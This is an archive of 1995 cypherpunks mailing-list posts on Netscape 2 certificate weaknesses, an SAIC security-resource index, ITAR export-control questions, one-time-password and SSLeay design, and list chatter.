ineligible to get a license permitting them to disclose their software
to other foreigners (or even to themselves).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 13 Oct 95 12:50:45 PDT
To: cypherpunks@toad.com
Subject: Same ol' massive MITM exposure in Netscape 2.01b
Message-ID: <Pine.SOL.3.91.951013122654.26464D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Just to repeat old news: Netscape 2 has similar  exposure to MITM attacks 
to 1.1. 

Netscape 2 does make one variant of the MITM attack less useful: The 
new document  info page allows information to be obtained about inlined 
images as well as the base page; this breaks the old attack of only 
intercepting inline image requests (which can be used to steal 
information in request headers without there being any chance of your 
certificate showing up). 


1) The client does not do any verification that the certificate used for 
the transaction is one associated with the server, allowing MITM 
substitutions as long as the server has a properly signed certificate

2) The client does not issue warnings for redirections from one https 
page to another https page, even if the url to which it is redirected has 
a different hostname to the url originally dereferenced.

3) In the case of redirection, the document info screen does not provide 
information about the originaly referenced page, just the final page. 
This allows the MITM to intercept the first request, steal the request 
data, then issue a redirect to hide the certificate used in the intercept. 

4) In the beta version, the document info page does not display the 
security info (I did check with  MITM disabled). 


Simon

-----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L.Detweiler" <ldetweil@csn.net>
Date: Fri, 13 Oct 95 12:05:36 PDT
To: cypherpunks@toad.com
Subject: CYPHERPUNKS EXPOSED
Message-ID: <199510131905.NAA00772@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



Attn Reporters and Writers!! 

who are the CYPHERPUNKS?
what are they talking about?
what have they done in the past?
who are the "leaders"?
what do they believe in? 
what are their *real* goals?

My name is L.Detweiler, and I've made a serious study of the more ulterior 
aspects of the CYPHERPUNKS for several years, and I invite you to peruse my
findings at the web site below.

I've been quoted in various articles and I'm available for serious interviews
with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.

note: be forewarned that key cypherpunks consider me a heretical 
blasphemer because of the tenacious, unforgiving honesty and 
zealous antisychophancy by which I have pursued this herculean study.


|   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey
http://www.csn.net/~ldetweil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 13 Oct 95 05:09:56 PDT
To: cypherpunks@toad.com
Subject: Insecurity Section of the Internet Handbook
Message-ID: <199510131209.NAA20556@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



For zoetrope, and others curious about the Insecurity
section of the Internet Handbook, we pass along this
Yellow Pages advert-insert comp sec teaser from
SAIC -- with only dribbles of cryptography. The puffery
appears to be artfully fattened and out-of-date. Like most
security porkers, SAIC sells its nitrated sec services
dearly (security by deep pockets of the fearful engorgers)
while feigning Net public-spirit to mask IP search and
steal. In a telling slight, SAIC does not cite outturned-
pockets, beef jerky Cypherpunks.

_______________________________________________________

URL: http://mls.saic.com/library.html [which links to the
listed contents]
   
                   SECURITY LIBRARY
           
The SAIC Security Library contains security-related 
infomation and programs from around the Net. SAIC does
not verify or endorse such files or any use thereof.
   
Notices and Upcoming Events [Not included here]

Advisories and Alerts

Newsgroups

Documents

Programs

Other Security Sites

_______________________________________________________

URL: http://mls.saic.com/alerts.html
 
            SECURITY ADVISORIES AND ALERTS
                                       
Alerts

   *  Sun Security Alerts
   *  CERT - Computer Emergency Response Team
   *  ASSIST - Automated Systems Security Incident
      Support Team
   *  AUSERT - Australian Security Emergency Response
      Team
   *  NASIRC - NASA Automated Systems Incident Response
      Capability
   *  DDN - Defense Data Network
   *  FIRST - Forum of Incident Response and Security
      Teams
       
Advisories

   *  8lgm Advisories
   *  Bugtraq Archives, threaded
   *  CERT Advisories
   *  CIAC - Computer Incident Advisory Capability 
     
_______________________________________________________

URL: http://mls.saic.com/docs.html
  
                  SECURITY DOCUMENTS

These documents are from the Net and cover a wide area of
topics concerning computer security. They are for the
education and legitimate use of computer security
techniques only. All non-FAQ documents are in PostScript
format unless otherwise noted.
     
______________________________________________________
   
Frequently Asked Questions

   *  Basic Computer Security
   *  Firewalls
   *  Setting Up Anonymous FTP
   *  What To Do If Your Machine Is Compromised
   *  Security Patches
   *  Vendor Contacts
   *  Pretty Good Privacy (PGP)
   *  #hack FAQ
   *  Cryptography FAQ 
     
_______________________________________________________

Firewalls

   Introductory Papers

   *  Internet Firewalls - An Introduction (August 1994,
      221K)
   *  Keeping Your Site Comfortably Secure: An
      Introduction to Internet Firewalls (Undated, 1.8M)
   
   General Firewall Documents

   *  A Network Firewall (June 1992, 374K)
   *  A Toolkit and Methods for Internet Firewalls
      (Undated, 185K)
   *  Proper Care and Feeding of Firewalls (November
      1994, 121K)
   *  A Network Perimeter with Secure External Access
      (Undated, 268K)
   *  An Internet Gatekeeper (Undated, 149K)
   *  Thinking About Firewalls (Undated, 109K)
   *  X Through Firewalls, and Other Application Relays
      (May 1993, 430K)
       
_______________________________________________________

   
WWW Security

   *  Security and the World Wide Web (June 1994, 10K
      HTML)
   *  NCSA on Mosaic Security Issues(December 1994, 1.6K
      HTML)
   *  Shen: A Security Scheme for the Web (Undated, 1.7K
      HTML)
   *  Using PGP/PEM Encryption (Undated, 7.6K HTML)
   *  Secure HTTP (Undated, 2.2K HTML)
   
_______________________________________________________

Intrusion Detection

   *  A Software Architecture to support Misuse
      Intrusion Detection (March 1995, 250K)
   *  An Application of Pattern Matching in Intrusion
      Detection (June 1994, 674K)
   *  Algorithm for Distrubuted Recognition and
      Accountability (Undated, 209K)
   *  A Pattern Matching Model for Misuse Intrusion
      Detection (Undated, 191K)
   *  AI Approach to Intrusion Detection (June 1994,
      168K)
   *  Intrusion Detection In Computers (January 1991,
      12K text)
   *  USTAT - A Real-time Intrusion Detection System for
      UNIX (November 1992, 1.3M)
     
_______________________________________________________

Improving your UNIX Security

   Technical Tips

   *  Setting up Sun Security (March 1992, 7K text)
   *  Miscellaneous Security Tips (October 1992, 23K
      text)
   *  CERT Generic Security Tips (July 1992, 17K text)
   *  UNIX Site Security Handbook (July 1991, 253K text)
   
Finding and Fixing Your Security Problems

   *  Improving the Security Of Your Site By Breaking
      Into It (Undated, 51K text)
   *  Finding Holes in Your System (October 1993, 16K
      text)
   *  Improving the Security of Your UNIX System (April
      1990, 274K)
   *  Becoming An Uebercracker to Stop Uebercrackers
      (December 1993, 9K text)

_______________________________________________________

The Internet Worm

   *  A Report on the Internet Worm (November 1988, 16K
      text)
   *  Technical Report on the Internet Worm Incident
      (September 1991, 173K)
   *  The Internet Worm Program: An Analysis (December
      1988, 283K)
   *  A Tour of the Worm (Undated, 166K)

_______________________________________________________

Tales of Computer Attacks and Countermeasures

   *  Five Incidents At Columbia University (Undated,
      93K)
   *  "An Evening With Berferd" (Undated, 82K)
   *  Internet Attack on Texas A&M (1993, 294K)
   *  "There Be Dragons" (August 1992, 185K)
   *  Computer Break-ins: A Case Study (Undated, 94K)
   *  System Admin Horror Stories (1992, 148K text)
     
_______________________________________________________
   
Networking

   TCP/IP Security

   *  TCP Wrapper Security (Undated, 59K)
   *  A Weakness in the 4.2BSD TCP/IP Software (February
      1985, 27K)
   *  Security Problems in the TCP/IP Protocol Suite
      (April 1989, 107K)
   *  Network (In)Security Through IP Packet Filtering
      (September 1992, 123K)   
   
   General Networking Documents

   *  Architecture and Implementation of Network-Layer
      Security under UNIX (Undated, 124K)
   *  Information Security And Privacy In Networks
      (Undated, 809K .tar file)
   *  Paving the Road to Network Security (May 1994,
      162K)
   *  NFS Tracing By Passive Network Monitoring
      (Undated, 170K)
             *  Addressing Weaknesses in the DNS Protocol 
(August
      1993, 406K)
   *  Countering Abuse of Name-Based Authentication
      (Undated, 243K)
   *  An Architectural Overview of UNIX Network Security
      (May 1993, 50K text)
   *  NIS Security Warning (December 1991, 7.5K)

_______________________________________________________

Trusted Systems

   *  The Orange Book (August 1983, 264K text)
   *  Understanding Configuration Management in Trusted
      Systems (March 1988, 138K text)
   *  Understanding DAC in Trusted Systems (September
      1987, 87K text)
   *  Understanding Facility Management in Trusted
      Systems (June 1989, 106K text)
   *  Understanding Trusted Distribution in Trusted
      Systems (December 1988, 55K text)
   *  Understanding Audit in Trusted Systems (July 1987,
      56K text)

_______________________________________________________

Newsletters

   *  COAST Newsletter
   *  Privacy Forum
   *  Cipher - Electronic Newsletter of the IEEE
      Technical Committee on Security and Privacy

_______________________________________________________

Miscellaneous Documents

   *  Security Term Glossary (Undated, 70K text)
   *  Open Systems Security - An Architectural Framework
      (June 1991, 300K text)
   *  Password Security: A Case History (Undated, 36K)
   *  Extracts from various security articles (Undated,
      61K text)
   *  Coping with the Threat of Computer Security
      Incidents (June 1990, 102K text)
   *  Threat Assessment of Malicious Code and Human
      Threats (October 1992, 231K)
   *  Tty Security - a Tty Session Manager (Undated,
      98K)
   *  Electromagnetic Emanation Eavesdropping (1989, 45K
      text)
   *  GAO Report on Internet Security (June 1989, 104K
      text)
   *  ACM SIG on Security, Audit, and Control
_______________________________________________________

URL: http://mls.saic.com/programs.html
   
                   SECURITY PROGRAMS

These programs are from various locations around the Net;
SAIC does not verify their functionality and/or
consequences of use. All programs are for assumed legal
uses and education. Unless noted, all programs are
intended for UNIX platforms.

Local (load directly to disk; gzip tar files unless
noted)

   *  COPS - Bulletproof your system from intruders
   *  Crack - Password cracker
   *  Cryptography File System (CFS) - Encrypted
      filesystems for SunOS
   *  Internet Security Scanner (ISS) - Checks UNIX
      sites for vulnerabilities
   *  ifstatus - Checks interfaces for promiscuous mode
   *  probe_ports - Finds open ports on UNIX systems
   *  Secure-Sun Check - Shell script to check several
      common SunOS vulnerabilities (no compression)

Remote

   *  Arpwatch - Ethernet monitor, keeps track of
      ethernet/IP address pairings
   *  Chalance - Intercept-proof password authentication
   *  chrootuid - Run network programs in a mininal
      environment
   *  CBW - Code Breaker's Workbench
   *  Courtney - Identifies the use of SATAN
   *  Dig - Sends domain name query packets to name
      servers
   *  DNSWalk
   *  Drawbridge - A bridging filter from TAMU
   *  Kerberos - Provides secure networking
   *  MegaPatch - Large number of SunOS patches in one
      bundle
   *  Netlog - TCP/UDP traffic logging system
   *  PGP - Pretty Good Privacy
   *  Portmap - Portmapper replacement, with access
      control
   *  SATAN - Checks computers/networks for security
      vulnerabilities
   *  Securelib - Protects RPC daemons
   *  screend - Filters IP packets
   *  Smrsh - Sendmail restricted shell
   *  Socks - Allows Internet access to firewalled
      machines
   *  SRA - Secure RPC Authentication for Telnet and FTP
   *  TAMU - Texas A&M Security Tool Package
   *  tcpdump - captures protocol packets from networks
   *  TCP Wrapper - ACLs for network services
   *  Tiger - Scans your UNIX system for security
      problems
   *  TIS Firewall Toolkit - Firewall package from TIS
   *  Tripwire - Watch for system file changes
   *  Watcher - Watches your system for security
      problems
 
_______________________________________________________

URL: http://mls.saic.com/sites.html
   
                 OTHER SECURITY SITES

Cryptography

   *  International Assoc. for Cryptologic Research
   *  Cryptography Web Page at UMBC
   *  Cryptography Export Control Archives
   *  Lawrie's Cryptography Bibliography
   *  RSA Data Security, Inc.
   *  Quadralay's Cryptography Archive
   *  Cryptography, PGP, and Your Privacy
   *  PGP Web Page
 
Firewall Vendors and Information

   *  Harris Computer Systems
   *  Sun Microsystems (SunScreen)
   *  Trusted Information Systems
   *  Cohesive Systems
   *  Sea Change Corp.
   *  Raptor Systems
   *  Greatcircle Firewall Server
   *  Virtual-One Network Environment Corp (V-ONE)
   *  CheckPoint Software Technologies Ltd.
   *  Firewalls.R.Us
 
Security Gophers

   *  InterNIC's Computer and Network Security
   *  NIST Security
   *  Security, Audit & Control (SIGSAC)

World Wide Web Security

   *  WWW Security Mailing List Archive
   *  WWW Security at Rutgers University
 
Intrusion Detection

   *  Intrusion Detection Systems Archives (threaded)
 
PC Security

   *  Safetynet, Inc.
 
Various Security Sites

   *  Computer Security Research Lab at UC Davis
   *  Computer Security at chalmers.se
   *  Harris Computer Systems
   *  Szymon Sokol's Security Site
   *  The Uebercracker's Web Site
   *  COAST Project and Laboratory
   *  Computer Underground Digest Archive
   *  Security News Clippings Archive
   *  EINet's Computer Virus and Security Page
   *  Crimelab
   *  Phrack Magazine Home Page
   *  TANSU's Security Reference Index
   *  Digital Equipment's Secure Systems Index
   *  Bellcore Security Products
   *  Texas A&M security tools
   *  ftp.win.tue.nl
   *  NIST Computer Security Resource Clearinghouse
   *  Christopher Menegay's Security Page
   *  Security Papers at Johns Hopkins University
   *  Dartmouth Security Tools
   *  CERT FTP Archive
   *  Computer Systems Consulting
   *  Computer Systems Consulting (Local Files)
   *  MIT's Athena Project
   *  Yahoo's Security and Encryption Page
   *  NIST Computer Security
   *  ALW Unix Security Information
   *  ALW's List of Unix Security Programs
   *  ESNet FTP site
   *  Bennet Yee's Security Page
   *  Various security FTP pointers

_______________________________________________________
   
Send questions and comments to Webmaster@mls.saic.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 10:23:38 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951013132130.480D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:
> What if you were a dual citizen (US/Canada in my case)?
> 
Get competent legal advice.  I.e. don't ask me.  As a general rule, I 
know of two principles that might be relevant here: 1) US and Canada 
rules on export control tend to be very similar; 2) lots of US rules 
apply to US persons abroad, not just income tax.  See, e.g., the Trading 
With the Enemy Act.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 10:35:55 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
Message-ID: <Pine.SUN.3.91.951013132317.480E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Vincent Cate wrote:

For your personal situation you *must* get competent legal advice.  
I.E. pay someone who makes it a point to stay more current in this stuff 
than I do.  I recommend Lee Tien, for example, or Ken Bass.  I bet Lee is 
less expensive :>.  This note is NOT legal advice, and may not be 
competent since it is research-free.  It would not be wise to make any 
important decisions on the basis of this note.

As a general matter, however, if you are a US person and give crypto to a 
foreign person (be it a real person or a corporation), then as a 
technical legal matter you are in violation of the ITAR. 

US law doesn't ordinarily cover non-us corporations abroad (but see some
anti-trust and money laundering rules), but the ITAR will cover any US
person (ie citizen or green card holder) who works for them or transacts
with them. 

Off the top of my head, I don't know whether the acquisition of totally
foreign-created crypto by a foreign corporation managed, owned or
controlled by a US person becomes an ITAR-controlled "export" when that 
crypto is sold to a non-us person.  I would, however, want a good legal 
opinion before I exposed myself to the risk as I could sure make a good 
argument that the ITAR reached that far.  All of this is without 
prejudice to the issue of whether the ITAR are constitutional...

As for the specific fact situation you describe below, which I understand
to be a little different from the one described above, I'm afraid you
would have to discuss this in some detail with a lawyer; I'm sorry I can't
be more help. 

> 
> On Fri, 13 Oct 1995, Michael Froomkin wrote:
> > On Thu, 12 Oct 1995, Vincent Cate wrote:
> > > If while you are outside the USA you want to write some software that uses
> > > encryption and sell it worldwide, let me know.  I could put you up while
> > > you wrote it and my company could sell it for share of the selling price. 
> > > Let me know what you are thinking of and how long you think it would take. 
> > 
> > Of course if you are a US person (citizen or green card holder) this is 
> > just as much a violation of the ITAR than if you did it from inside the US...
> 
> Yes, I am still a US citizen, so far. 
> 
> The corporation I work for is a legal entity of Anguilla.  I would not
> personally be selling it, the corporation would.  Do you think that is ok? 
> 
> What if I had a couple Anguillian friends form a corporation for this
> purpose (buying encryption software written in Anguilla and selling it
> internationally)?  No trouble yet, right?  What if the people who come and
> write it are US citizens?  
> 
> I don't see how US law can cover corporations in other countries.
> 
> PS - it is good to CC me (as you did) as I only get cypherpunks-lite, and
> so may not see a message, or it may be delayed. 
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 13 Oct 95 05:50:42 PDT
To: cypherpunks@toad.com
Subject: OneTimePasswd (not Pad)
Message-ID: <9510131250.AA28930@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



Hello,
I'm about to implement an OTPasswd (mostly like s/key) scheme to my
www browsers/clients/proxy, but I was wondering is the mere principle
of storing H^n(S) and requesting H^(n-1) from peer (H beeing your
favorite one way strong hash function (MD5), and S your seed+secret
passwd) could possibly be patented somehow and thus preventing using a
similar scheme without getting a license (from
bellcore?),.... if there are any usage conditions/restrictions?,... 

Also, can one compute the amount of information (if any) leaked by the
method, ie, an attacquant who would have all the
H^i  i={a...b}  (by snooping for instance) would have is job easied,
and by 'how much' to find S? (or H^a-1)  . is there any studies on
that for H=MD[45] ? (and what is the status of free use of MDx btw ?)

ps: I just an a thought that maybe the last P in elementrix POTP would
be Passwd and not Pad... it could still be quite interesting to have
H^n(S) (maybe variant with large n) used has 'secret' keys between
parties, you'll get lots of plus against standard attacks, provided
that there is no problem with know the function H^n for several
(possibly large) n... hmmm why this hasn't been implement ? what
obvious flaw am I missing ?


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Soviet NORAD SDI $400 million in gold South Africa plutonium KGB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 13 Oct 95 06:53:04 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
In-Reply-To: <199510130250.WAA08368@homeport.org>
Message-ID: <Pine.SOL.3.91.951013135056.2444A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Adam Shostack wrote:
> | (Btw... what would be the absolute coolest thing folk would like to see
> | added to RSAREF? That is, other than code that we will need to negotiate
> | for. What new thing, speed upgrade, enhancement, etc would just tickle?)
...
> 	Another really big win would be to add more entry points to
> the code to legitimize Wei Dai's excellent Crypto++ library, which has
> to jump in at all sorts of unpublished interfaces.

How about just making all the interfaces at the different levels 
available.  For the next version of SSLeay (when I get it and the 
documentation finished) will have defined interfaces at the following 
levels for the various ciphers etc.

The actual cipher level
	eg des_set_key, des_cfb_encrypt, idea_cbc_encrypt...
	This level is wanted by things like SSL for the fastest on the fly
	encryption possible.

The 'by parts' routines
	eg EncryptBegin, EncryptUpdate, EncryptFinish (which take a CIPHER 
	pointer as an argument).
	This is sort of wanted by people implementing higher level digital 
	signature routines but they are usefull in their own right.

The 'digital' envelope routines.
	eg SealBegin, SealUpdate, SealFinish (which take a CIPHER pointer, a 	
	MD pointer and the public keys etc.
	The high level stuff for PKCS-7/S-MIME/PEM etc.

I am also documenting the interface to the big number library (anyone 
want to do DSS :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 13 Oct 95 14:55:40 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <v02120d13aca49c9c9e70@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Actually, the idea for the meeting came out of a discussion
at a party that Marianne and I attended last summer. Chip
Morningstar (one of the co-founders of Electric Communities)
and I were getting heavily into Java; also, my wife and I
were starting to write a crypto package for Java (JCrypt).

Subsequently, at a focus group meeting at Sun, we discovered
that practically all of us were on cypherpunks.

It's just a happy accident that discussion about Java has hit
a crescendo here on the list. I suggested to mrm that we have
it at Sun, since the warehouse loft space in SF where we've
been meeting, charming as it is, isn't a great spot for doing
presentations and would likely have capacity problems for this
topic.

So no, this is not some great conspiracy on Sun's part to
co-opt the list. You can return to your regularly scheduled
paranoid fantasies. Thank you....









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 23:38:09 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130406.AA33835@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Yes. :)

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Fri, 13 Oct 95 15:21:47 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <Pine.LNX.3.91.951013151805.9143A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


>         Why would a compony like Netscape jeapordise themselves by even
> letting                                               out a beta version so
> hackers have time to find bugs before the full version is released. Don't
> take me wrong I have only been on the net fer a little over a year and Love
> Netscape.  And If I knew what I was Doing I would love to help them.....

Actually, it is not jeapordy that they get from doing so, but some of the 
best bug finders and security experts on the planet.. for close to free.
If hackers can find 10 bugs before final release, it means there is a 
good chance that they will fix those bugs before final release.

Think of it this way.. you practice a new task until you are competent at 
it.. beta code is the same.. it is the practice or scratch code that may 
be refined into the final product.

Thanks-
robL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 13 Oct 95 15:28:15 PDT
To: cypherpunks@toad.com
Subject: mental cryptography
Message-ID: <199510132226.PAA13627@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As we know, security is always relative to a threat model.  For example, most 
cryptographic protocols today will not protect their users against the cloning 
attack I described earlier, nor more mundanely, against video surveilence of 
your computing space.  What can you do if you ARE worried about such attacks?

The answer is doing cryptography in your head.  Well not quite, since many 
cryptographic operations are very computing intensive, and not everyone can do 
1000 bit mental modular exponention in a reasonable amount of time.  But if 
you have a piece of secure hardware that you can trust to do some of these 
operations for you, then all you need is a secure communications channel to 
this piece of hardware.  

There may be other ways, but I suggest that you establish a common key with 
your crypto server ahead of time, and then simply encrypt all your 
communications using a symmetric algorithm.  RC4 may be a reasonable choice, 
since the operations are simple and easy to remember, but you need to keep 
track of a 255-byte state.  WAKE is probably better.  Although it uses a large 
key table, you only have to memorize it once, after which the only state that 
is changing is four 32-bit registers.

I am sure better algorithms can be found for this purpose if mental 
cryptography is made explicit as a design goal.  Perhaps it should be?

 - the Mad Scientist in the Middle

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH7l+9IjPOsOWLIJAQEwDwP7BB6ZlEoYVoOFYtzNDcF4XpCKs71GyASC
TiwCf+donWycN9SiJHApyXXbnuppGiEyAQYMBGkSLMyIwPMcE4v6CSt2DkpbPjkF
XauZy4rqDNljV2pk7PldbPOHDow9wOeoSF2S/luKAoHx5aJWVQrE5SKIgwY2xWfx
DYhjte2v9Jc=
=88be
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Wertz <hwertz@exclusive.com>
Date: Fri, 13 Oct 95 13:34:17 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.LNX.3.91.951013153201.21699D-100000@henry.henry.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995 infinet.com!zoetrope@henry.henry.net wrote:
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Ouch!  I know,
                                                         I need to fix it..
                                                         but sendmail.cf
                                                         beating is not
                                                         much fun 8-(.
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
> 
> 
> 
     Just for "cracking unix codes" crack is fine with me 8-).  I'm just in
it for the knowledge..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Fri, 13 Oct 95 12:42:43 PDT
To: cypherpunks@toad.com
Subject: Netscape question transformed
Message-ID: <m0t3pvO-000K7RC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I would like to rephrase the question I had yesterday was
completely misunderstood.  The point I was meaning to make was soppuse to
be as follows:



        Why would a compony like Netscape jeapordise themselves by even
letting                                               out a beta version so
hackers have time to find bugs before the full version is released. Don't
take me wrong I have only been on the net fer a little over a year and Love
Netscape.  And If I knew what I was Doing I would love to help them.....





        Anyway I don't mean to waste your time, but arent these kinda
things for stating your opinion?  And to clarify any questions on my age I
am 13 and was born in 1982.ok? thanks.....And I would again like to thank
perry for understanding what level Im on. I will try my best not to annoy
you or cause you any inconvenience.  And to sameer I am sorry for what I
said but you have to understyand Why I said it......

                        Sincerely,
                                CyberPunc X 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 13 Oct 95 15:48:59 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: applications
Message-ID: <199510132243.PAA16846@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Fri Oct 13 15:41:23 1995
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Fri, 13 Oct 1995 17:50:29 -0400
> To: cypherpunks@toad.com
> From: zoetrope@infinet.com (cYberpUnc)
> Subject: applications
> Sender: owner-cypherpunks@toad.com
> Content-Length: 218
> 
>         I know this isnt what you guys generally talk about but I was curious.
> Off the top of your head do you know of any sites where I can get kracking
> apps for macs?  Any information would be greatly appreciated.
> 
> 
> 

Has someone set up a mail-to-news gateway between cypherpunks and alt.2600
that we're unaware of?

Dana W. Albrecht
dwa@corsair.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Fri, 13 Oct 95 07:59:43 PDT
To: adam@homeport.org
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <m0t3lUR-0002e4C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Adam" == Adam Shostack <adam@homeport.org> writes:

    Adam> 	The new betas of Netscape store CA trust stuff in a
    Adam> NDBM database.  Does anyone have good tools for looking at
    Adam> NDBM stuff?

In Perl a NDBM database looks like an associative array.

Andreas



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMH59b0yjTSyISdw9AQFiEwP/RxshjTL9vHuGrsHmq4yVdda7M9oQttX8
ms0Mkla1VP+aTh9cSu/B9bzPaX5DmVZ1KDKv/NoHlqcXTQl9BlokiwDtOPKGDCq2
bt08ubgnUF1H5r9aTgaU+qp4qhOo4aUHOwPSV/DC1SLVWk23UYASm+LXAwtwPf0X
sMkEI8GIYy8=
=zGky
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Fri, 13 Oct 95 16:40:10 PDT
To: cypherpunks@toad.com
Subject: cryptp & PCMCIA committee mtg notes
Message-ID: <v02120d01aca4a227e012@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


Clipper ain't dead yet:

TECHNICAL MEETING UPDATES - Discussion and work on the following
topics occurred at the meeting: Zoom Video, Thermal Characterization of a
card inside a laptop, Changes to Custom Interfaces, Indirect Access to PC
Card memory, and changes/clarification to the Multifunction specification
(this one was deemed very important).  A presentation was made by Spyrus
on security cards and a proposal to set up a technical working group was
made. ........

2) PC Card Working Group Security Card proposal by Spyrus - wants
security card id to be a part of the standard and supported by system
software.  The government Fortezza card would be included.


**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Fri, 13 Oct 95 13:33:36 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting Mental States
Message-ID: <9510132031.AA10823@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


